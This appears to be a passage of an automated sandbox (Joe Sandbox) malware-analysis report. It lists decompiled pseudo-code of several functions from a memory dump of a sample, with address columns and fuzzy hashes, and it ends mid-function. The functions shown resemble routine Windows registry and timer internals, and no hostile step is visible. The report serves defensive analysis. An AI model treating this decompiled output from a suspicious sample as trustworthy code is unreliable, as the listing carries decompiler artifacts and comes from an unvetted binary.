                                                              0x00a5519e
                                                              0x00a551a7
                                                              0x00a551a9
                                                              0x00a551a9
                                                              0x00a551b5
                                                              0x00a551b8
                                                              0x00a551bb
                                                              0x00a551be
                                                              0x00a551c1
                                                              0x00a551c5
                                                              0x00a551c9
                                                              0x00a551cd
                                                              0x00a551cd
                                                              0x00a551d8
                                                              0x00a551dc
                                                              0x00a551e0
                                                              0x00a96dcc
                                                              0x00a96dd0
                                                              0x00a96dd5
                                                              0x00a96ddd
                                                              0x00a96de1
                                                              0x00a96de1
                                                              0x00a96de5
                                                              0x00a96deb
                                                              0x00a96df1
                                                              0x00a96df7
                                                              0x00a96dfd
                                                              0x00a96e01
                                                              0x00a96e05
                                                              0x00a96e09
                                                              0x00a96e0d
                                                              0x00a96e11
                                                              0x00a96e11
                                                              0x00a551eb
                                                              0x00a96e1a
                                                              0x00a96e1f
                                                              0x00a96e21
                                                              0x00a96e23
                                                              0x00000000
                                                              0x00a551f1
                                                              0x00a551f1
                                                              0x00000000
                                                              0x00a551f1

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eefb65d0ed051d8bdf7bbd7de19c03b9eaa143b81826978d5ea4292556e915a
                                                              • Instruction ID: 601db0f3709ccc78be243334ddd5ad0dc34e55f31c70027223f489c3baa5322b
                                                              • Opcode Fuzzy Hash: 5eefb65d0ed051d8bdf7bbd7de19c03b9eaa143b81826978d5ea4292556e915a
                                                              • Instruction Fuzzy Hash: 98C123756087808FD754CF28C590A5AFBF1BF88304F188A6EF8998B362D771E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A503E2 Relevance: .3, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 74%
                                                              			E00A503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0xb1d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00A50548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00A6B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00A3B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0xb17c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00A47D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00A47D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E00AA7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00A69830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00AA69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0xb17c04 != 0) {
						_t118 = _v12;
						_t120 = E00AAA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0xb17bd8;
						if( *0xb17bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00A695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00A699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E00AA3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00A2B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00A6AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0xb18474 - 3;
										if( *0xb18474 != 3) {
											 *0xb179dc =  *0xb179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00A47D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00A47D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00AA7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0xb18708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0xb17b00; // 0x0
							asm("ror esi, cl");
							 *0xb1b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00A695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00A37F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                              0x00a503f1
                                                              0x00a503f7
                                                              0x00a503f9
                                                              0x00a503fb
                                                              0x00a503fd
                                                              0x00a50400
                                                              0x00a5040a
                                                              0x00a94c7a
                                                              0x00a50537
                                                              0x00a50547
                                                              0x00a50410
                                                              0x00a50410
                                                              0x00a50414
                                                              0x00a50417
                                                              0x00a5041a
                                                              0x00a50421
                                                              0x00a50424
                                                              0x00a5042b
                                                              0x00a5043b
                                                              0x00a5043e
                                                              0x00a5043f
                                                              0x00a5043f
                                                              0x00a50446
                                                              0x00a50449
                                                              0x00a5044c
                                                              0x00a5044f
                                                              0x00a50459
                                                              0x00a94c8d
                                                              0x00a5045f
                                                              0x00a5045f
                                                              0x00a5045f
                                                              0x00a50467
                                                              0x00a94c97
                                                              0x00a94c9d
                                                              0x00a94ca4
                                                              0x00a94caa
                                                              0x00a94caf
                                                              0x00a94cb1
                                                              0x00a94cc3
                                                              0x00a94cb3
                                                              0x00a94cbc
                                                              0x00a94cbc
                                                              0x00a94cc8
                                                              0x00a94ccb
                                                              0x00a94cd7
                                                              0x00a94cda
                                                              0x00a94cdf
                                                              0x00a94cdf
                                                              0x00a94ccb
                                                              0x00a94ca4
                                                              0x00a5046d
                                                              0x00a5046f
                                                              0x00a5046f
                                                              0x00a50471
                                                              0x00a50476
                                                              0x00a5047a
                                                              0x00a5047b
                                                              0x00a50483
                                                              0x00a50489
                                                              0x00a5048d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94ce9
                                                              0x00a94cef
                                                              0x00a94d22
                                                              0x00a94d22
                                                              0x00000000
                                                              0x00a94d22
                                                              0x00a94cf1
                                                              0x00a94cf7
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94cf9
                                                              0x00a94cff
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94d05
                                                              0x00a94d07
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94d0d
                                                              0x00a94d0f
                                                              0x00a94d14
                                                              0x00a94d16
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94d1c
                                                              0x00a94d1c
                                                              0x00a50499
                                                              0x00a50535
                                                              0x00a50535
                                                              0x00000000
                                                              0x00a50535
                                                              0x00a504a6
                                                              0x00a94d2c
                                                              0x00a94d37
                                                              0x00a94d39
                                                              0x00a94d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94d41
                                                              0x00a94d48
                                                              0x00a50527
                                                              0x00a5052b
                                                              0x00a5052d
                                                              0x00a50530
                                                              0x00a50530
                                                              0x00000000
                                                              0x00a5052b
                                                              0x00a94d4e
                                                              0x00a504ac
                                                              0x00a504ac
                                                              0x00a504af
                                                              0x00a504b2
                                                              0x00a504b7
                                                              0x00a504b9
                                                              0x00a504bb
                                                              0x00a504bd
                                                              0x00a504bf
                                                              0x00a504c5
                                                              0x00a504c9
                                                              0x00a94d53
                                                              0x00a94d59
                                                              0x00a94db9
                                                              0x00a94dba
                                                              0x00a94dbf
                                                              0x00a94dc2
                                                              0x00a94dc4
                                                              0x00a94dc7
                                                              0x00a94dce
                                                              0x00000000
                                                              0x00a94dce
                                                              0x00a94d5b
                                                              0x00a94d61
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94d63
                                                              0x00a94d69
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94d6b
                                                              0x00a94d6e
                                                              0x00a94d74
                                                              0x00a94d76
                                                              0x00a94d7c
                                                              0x00a94d7e
                                                              0x00a94d84
                                                              0x00a94d89
                                                              0x00a94d8c
                                                              0x00a94d8d
                                                              0x00a94d92
                                                              0x00a94d95
                                                              0x00a94d96
                                                              0x00a94d98
                                                              0x00a94d9a
                                                              0x00a94d9f
                                                              0x00a94da4
                                                              0x00a94da6
                                                              0x00a94da8
                                                              0x00a94daf
                                                              0x00a94db1
                                                              0x00a94db1
                                                              0x00a94daf
                                                              0x00a94da6
                                                              0x00a94d84
                                                              0x00a94d7c
                                                              0x00000000
                                                              0x00a94d74
                                                              0x00a504d6
                                                              0x00a94de1
                                                              0x00a504dc
                                                              0x00a504dc
                                                              0x00a504dc
                                                              0x00a504e4
                                                              0x00a94deb
                                                              0x00a94df1
                                                              0x00a94df8
                                                              0x00a94dfe
                                                              0x00a94e03
                                                              0x00a94e05
                                                              0x00a94e17
                                                              0x00a94e07
                                                              0x00a94e10
                                                              0x00a94e10
                                                              0x00a94e1c
                                                              0x00a94e1f
                                                              0x00a94e35
                                                              0x00a94e35
                                                              0x00a94e1f
                                                              0x00a94df8
                                                              0x00a504f1
                                                              0x00a504fa
                                                              0x00a94e3f
                                                              0x00a94e47
                                                              0x00a94e5b
                                                              0x00a94e61
                                                              0x00a94e67
                                                              0x00a94e69
                                                              0x00a94e71
                                                              0x00a94e73
                                                              0x00a50500
                                                              0x00a50500
                                                              0x00a50500
                                                              0x00a504fa
                                                              0x00a50508
                                                              0x00a5051d
                                                              0x00a5051d
                                                              0x00a5051f
                                                              0x00a50524
                                                              0x00000000
                                                              0x00a50524
                                                              0x00a50515
                                                              0x00a50517
                                                              0x00a94e7a
                                                              0x00a94e7c
                                                              0x00000000
                                                              0x00000000
                                                              0x00a94e85
                                                              0x00000000
                                                              0x00a94e85
                                                              0x00000000
                                                              0x00a50517

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd00d9f676e553ad2937c5cf24637191088574b014536f23f3c2a9aad5477101
                                                              • Instruction ID: 7270831ec2b07595f13ac577a71e09fafd069b16c8813acde18fc76b46730e63
                                                              • Opcode Fuzzy Hash: bd00d9f676e553ad2937c5cf24637191088574b014536f23f3c2a9aad5477101
                                                              • Instruction Fuzzy Hash: 79911F31E04214AFEF219B68C844FAE7BF4BB09721F154261EE10AB2E1EB349C05CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A56A60 Relevance: .2, Instructions: 227COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 66%
                                                              			E00A56A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xb1d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00A69810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xb16908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00A6CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00A6CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00A6D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00A6B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00A6AA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00A6D000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00A6AA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                              0x00a56a6f
                                                              0x00a56a72
                                                              0x00a56a78
                                                              0x00a56a7c
                                                              0x00a56a7f
                                                              0x00a56a87
                                                              0x00a98049
                                                              0x00a98049
                                                              0x00a9804e
                                                              0x00a9804f
                                                              0x00a98057
                                                              0x00a9805c
                                                              0x00000000
                                                              0x00a56a8d
                                                              0x00a56a92
                                                              0x00a56a92
                                                              0x00a56a94
                                                              0x00a56a99
                                                              0x00a56a9c
                                                              0x00a56a9f
                                                              0x00a56aa2
                                                              0x00a56aaa
                                                              0x00a56ab0
                                                              0x00a97eae
                                                              0x00a97eb4
                                                              0x00a97eb9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97ebf
                                                              0x00a97ebf
                                                              0x00a97ebf
                                                              0x00a97ec1
                                                              0x00a97ec6
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97ece
                                                              0x00a97edb
                                                              0x00a97ee5
                                                              0x00a97ee7
                                                              0x00a97ee7
                                                              0x00a97edd
                                                              0x00a97edd
                                                              0x00a97edd
                                                              0x00a97eea
                                                              0x00a97ed0
                                                              0x00a97ed0
                                                              0x00a97ed3
                                                              0x00a97ed3
                                                              0x00a97eec
                                                              0x00a97ef8
                                                              0x00a97f00
                                                              0x00a97f07
                                                              0x00a97f0a
                                                              0x00a97f19
                                                              0x00a97f1b
                                                              0x00a97f23
                                                              0x00a97f25
                                                              0x00a97f28
                                                              0x00a97f2e
                                                              0x00a97f31
                                                              0x00a97f34
                                                              0x00a97f37
                                                              0x00a97f3c
                                                              0x00000000
                                                              0x00a97f3e
                                                              0x00a97f3e
                                                              0x00a97f41
                                                              0x00a56b35
                                                              0x00a56b38
                                                              0x00a56b44
                                                              0x00a56b4c
                                                              0x00a56b4e
                                                              0x00a56b51
                                                              0x00a56b69
                                                              0x00a56b69
                                                              0x00a97f3c
                                                              0x00a98046
                                                              0x00000000
                                                              0x00a98046
                                                              0x00a56abc
                                                              0x00a56aca
                                                              0x00a97f49
                                                              0x00a56b13
                                                              0x00a56b13
                                                              0x00a56b16
                                                              0x00a56b1e
                                                              0x00a97fe7
                                                              0x00a97fea
                                                              0x00a97fed
                                                              0x00a97ff0
                                                              0x00a97ff2
                                                              0x00a97ff4
                                                              0x00a97ffa
                                                              0x00000000
                                                              0x00000000
                                                              0x00a98000
                                                              0x00a98003
                                                              0x00a98006
                                                              0x00a98009
                                                              0x00a9800b
                                                              0x00a9800d
                                                              0x00a98010
                                                              0x00a9801f
                                                              0x00000000
                                                              0x00000000
                                                              0x00a98025
                                                              0x00a56b2f
                                                              0x00a56b2f
                                                              0x00a56b32
                                                              0x00000000
                                                              0x00a56b32
                                                              0x00a56b26
                                                              0x00a98030
                                                              0x00a9803a
                                                              0x00a9803c
                                                              0x00a9803c
                                                              0x00a98032
                                                              0x00a98032
                                                              0x00a98032
                                                              0x00a9803f
                                                              0x00a56b2c
                                                              0x00a56b2c
                                                              0x00a56b2c
                                                              0x00000000
                                                              0x00a56b26
                                                              0x00a56ad0
                                                              0x00a56ad6
                                                              0x00a56ade
                                                              0x00a56ae0
                                                              0x00a56ae0
                                                              0x00a56ae5
                                                              0x00a97f53
                                                              0x00a56aeb
                                                              0x00a56aeb
                                                              0x00a56aeb
                                                              0x00a56af3
                                                              0x00a97f5e
                                                              0x00a97f61
                                                              0x00a97f68
                                                              0x00a97f69
                                                              0x00a97f6b
                                                              0x00a97f70
                                                              0x00a97f71
                                                              0x00a97f76
                                                              0x00a97f77
                                                              0x00a97f7c
                                                              0x00a97f86
                                                              0x00a97f88
                                                              0x00a97f8d
                                                              0x00a97f92
                                                              0x00a97f97
                                                              0x00a97f98
                                                              0x00a97f99
                                                              0x00a97f9a
                                                              0x00a97f9f
                                                              0x00a97fa0
                                                              0x00a97fa5
                                                              0x00a97faa
                                                              0x00a97faa
                                                              0x00a97faf
                                                              0x00a97fdc
                                                              0x00a97fdf
                                                              0x00000000
                                                              0x00a97fb1
                                                              0x00a97fb1
                                                              0x00a97fb3
                                                              0x00a97fb8
                                                              0x00a97fd4
                                                              0x00a97fd4
                                                              0x00000000
                                                              0x00a97fd4
                                                              0x00a97fba
                                                              0x00a97fbc
                                                              0x00a97fc2
                                                              0x00a97fc4
                                                              0x00a97fc4
                                                              0x00a97fc7
                                                              0x00a97fcb
                                                              0x00a97fcc
                                                              0x00a97fd1
                                                              0x00000000
                                                              0x00a97fd1
                                                              0x00a56b04
                                                              0x00a56b04
                                                              0x00a56b0b
                                                              0x00000000
                                                              0x00000000
                                                              0x00a56b11
                                                              0x00000000
                                                              0x00a56b11
                                                              0x00a56af3

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16cf8a3ae5ba039daf1829e07822ea771c637de5726db25d64dedfb46ef4eeb9
                                                              • Instruction ID: 2efe9a72abac96c50b834f8a1cd2e41e81308eb6cd667c55e6c45836587927ab
                                                              • Opcode Fuzzy Hash: 16cf8a3ae5ba039daf1829e07822ea771c637de5726db25d64dedfb46ef4eeb9
                                                              • Instruction Fuzzy Hash: C9815975E002199FDF24CF99C981BEEBBF5AF08340F548069E945BB281D735AD05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2C600 Relevance: .2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 67%
                                                              			E00A2C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0xb1d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00A36D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E00A6B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0xb17b9c; // 0x0
					_t74 = L00A44620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E00A69650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L00A477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E00A6F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
